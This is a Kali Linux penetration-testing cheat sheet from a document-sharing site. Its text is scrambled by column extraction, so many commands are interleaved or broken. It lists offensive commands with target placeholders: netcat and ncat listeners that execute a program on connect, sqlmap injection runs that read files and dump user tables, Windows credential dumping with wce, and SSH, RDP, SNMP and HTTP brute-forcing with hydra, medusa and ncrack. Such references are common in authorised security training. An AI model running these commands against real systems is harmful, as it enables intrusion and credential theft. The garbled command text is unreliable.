Kali Linux Commands Cheat Sheet

Linux skills
Oregon State University (OSU)
2 pag.

Document shared on [Link]

Downloaded by: 1C3_8R34K3R (monoliticstone@[Link])
Kali Linux Cheat Sheet by A. Wong
Mount File Shares
COMMAND DESCRIPTION
Basic Command
mount [Link]:/vol/share /mnt/nfs Mount NFS share to /mnt/nfs
COMMAND DESCRIPTION mount -t cifs -o Mount Windows CIFS / SMB share on Linux at /mnt/cifs if
grep “substring” target-file Extract the lines contains “substring” username=user,password=pass you remove password it will prompt on the CLI (more
,domain=blah //192.168.1.X/share-name secure as it wont end up in bash_history)
grep –o “regex” target-file Same as above with regular expression as input /mnt/cifs

cut -d "/" -f 3 Split the string by “/” and output the third column net use Z: \\win-server\share password Mount a Windows share on Windows from the command
/user:domain\janedoe /savecred /p:no line
sort –u Remove duplicate

host “hostname” Return the IP address of the host name SNMP Enumeration
wc –l [Link] Count the number of line in “[Link]” COMMAND DESCRIPTION
uniq -c Add the number of occurrence in front snmpcheck -t 192.168.1.X -c public SNMP enumeration
cat [Link] | cut -d " " -f 1 | sort | uniq count the number of occurrence and sort it reversely snmpwalk -c public -v1 192.168.1.X 1| SNMP enumeration
-c | sort -urn grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X SNMP enumeration

Netcat / ncat
onesixtyone -c names -i hosts SNMP enumeration
COMMAND DESCRIPTION
DNS Enumeration & Transfer
nc –nv target –p port Connect to specific port of the target machine
COMMAND DESCRIPTION
nc –nlvp port –e filename Listen in specific port and execute the program after
connect dnsrecon -d [Link] -t axfr Enum and attemp to transfer target domain
ncat --exec [Link] --allow [Link] -vnl Listen in port 4444, allow only [Link] to connect, dnsenum [Link] Enum and attemp to transfer target domain
4444 --ssl execute [Link] after connect, encrypt with SSL

ncat -v [Link] 4444 --ssl Connect to target at port 4444, encrypt with SSL SMB Enumeration

NMAP COMMAND DESCRIPTION

nbtscan [Link]/24 Discover Windows / Samba servers on subnet, finds

COMMAND DESCRIPTION
Windows MAC addresses, netbios name and discover
nmap –v –sS –A –T4 target Nmap verbose scan, runs syn stealth, T4 timing (should be client workgroup / domain
ok on LAN), OS and service version info, traceroute and
enum4linux -a target-ip Do Everything, runs all options (find windows client
scripts against services
domain / workgroup) apart from dictionary based share
nmap -v -sS -p–A -T4 target As above but scans all TCP ports (takes a lot longer) name guessing

nmap -v -sU -sS -p- -A -T4 target As above but scans all TCP ports and UDP scan (takes even HTTP Enumeration
longer)

nmap -v -p 445 –script=smb-check-vulns Nmap script to scan for vulnerable SMB servers – COMMAND DESCRIPTION
–script-args=unsafe=1 192.168.1.X WARNING: unsafe=1 may cause knockover
nikto -h [Link] Perform a nikto scan against target
ls /usr/share/nmap/scripts/* | grep ftp Search nmap scripts for keywords
dirbuster Configure via GUI, CLI input doesn’t work most of the time

Document shared on [Link]

Downloaded by: 1C3_8R34K3R (monoliticstone@[Link])
Packet Inspection Port Forward

COMMAND DESCRIPTION COMMAND DESCRIPTION

tcpdump tcp port 80 –w [Link] i tcpdump for port 80 on interface eth0, outputs to ssh <gateway> -L <local port to Local port forward. [Link]:<port> is now redirected to
eth0 [Link] listen>:<remote host>:<remote port> the remote host

Wireshark GUI tools that perform packet inspection ssh <gateway> -R <remote port to Remote port forward. Access [Link]:<port> now to
bind>:<local host>:<local port> connect to the remote host at remote binded port
Password Generation ssh -D <local proxy port> -p <remote Dynamic port forward. We created a SOCK proxy at local
port> <target> machine now.
COMMAND DESCRIPTION

/usr/share/wordlists/ Kali password list SQL Map

crunch 6 6 0123456789ABCDEF -o Generate password list with only 0-9, A-F character, COMMAND DESCRIPTION
[Link] length = 6, output to [Link]
sqlmap -u [Link] –forms –batch Automated sqlmap scan
crunch 4 4 -f Generate password list with specific character set, length –crawl=10
/usr/share/crunch/[Link] mixalpha =4 –cookie=jsessionid=54321 –level=5 –
risk=3
cewl [Link] -m 6 -w Generate password list from megacorpone website and
[Link] output to [Link] sqlmap -u TARGET -p PARAM – Targeted sqlmap scan
data=POSTDATA –cookie=COOKIE
nano /etc/john/[Link] Mutate password according to the rules –level=3 –current-user –current-db –
john --wordlist=[Link] --rules passwords
--stdout > [Link] –file-read=”/var/www/[Link]”
sqlmap -u Scan url for union + error based injection with mysql
Password Cracking “[Link] backend
–dbms=mysql –tech=U –random-agent – and use a random user agent + database dump
COMMAND DESCRIPTION dump
sqlmap -o -u “[Link] – sqlmap check form for injection
[Link] Dump windows password hash
forms
wce -w Dump the windows clear text password sqlmap -o -u “[Link] – sqlmap dump and crack hashes for table users on
forms database-name.
medusa -h [Link] -u admin -P HTTP Bruteforce
-D database-name -T users –dump
[Link] -M http -m
DIR:/admin -T 10

ncrack -vv --user offsec -P password- RDP Bruteforce

[Link] rdp://[Link]

hydra -P [Link] -v [Link] SNMP Bruteforce

snmp

hydra -l root -P [Link] SSH Bruteforce

[Link] ssh

Document shared on [Link]

Downloaded by: 1C3_8R34K3R (monoliticstone@[Link])